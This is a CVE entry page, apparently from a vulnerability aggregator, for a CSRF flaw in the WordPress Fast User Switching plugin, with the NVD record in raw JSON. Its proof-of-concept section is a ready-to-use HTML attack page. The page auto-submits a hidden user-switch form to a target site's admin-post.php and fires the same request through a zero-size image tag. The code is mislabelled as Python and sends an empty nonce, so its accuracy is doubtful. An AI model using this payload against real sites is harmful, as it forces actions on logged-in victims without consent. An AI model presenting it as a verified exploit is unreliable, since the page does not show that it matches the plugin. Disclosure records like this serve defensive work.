Security Vulnerability Report
中文
CVE-2025-68583 CVSS 4.3 MEDIUM

CVE-2025-68583

Published: 2025-12-24 13:16:26
Last Modified: 2026-04-27 19:16:34

Description

Cross-Site Request Forgery (CSRF) vulnerability in Tikweb Management Fast User Switching fast-user-switching allows Cross Site Request Forgery.This issue affects Fast User Switching: from n/a through <= 1.4.10.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fast User Switching插件 <= 1.4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-68583 CSRF in WordPress Fast User Switching Plugin --> <html> <body> <p>CSRF Attack - Fast User Switching Plugin</p> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="fast-user-switch" /> <input type="hidden" name="user_id" value="1" /> <input type="hidden" name="switch_to_user" value="2" /> <input type="hidden" name="_wpnonce" value="" /> </form> <script> document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Alternative: Image tag-based auto-submit (Social Engineering) --> <img src="http://target-wordpress-site.com/wp-admin/admin-post.php?action=fast-user-switch&user_id=1&switch_to_user=2" width="0" height="0" border="0" />

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68583", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:25.507", "lastModified": "2026-04-27T19:16:33.680", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Tikweb Management Fast User Switching fast-user-switching allows Cross Site Request Forgery.This issue affects Fast User Switching: from n/a through <= 1.4.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fast-user-switching/vulnerability/wordpress-fast-user-switching-plugin-1-4-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}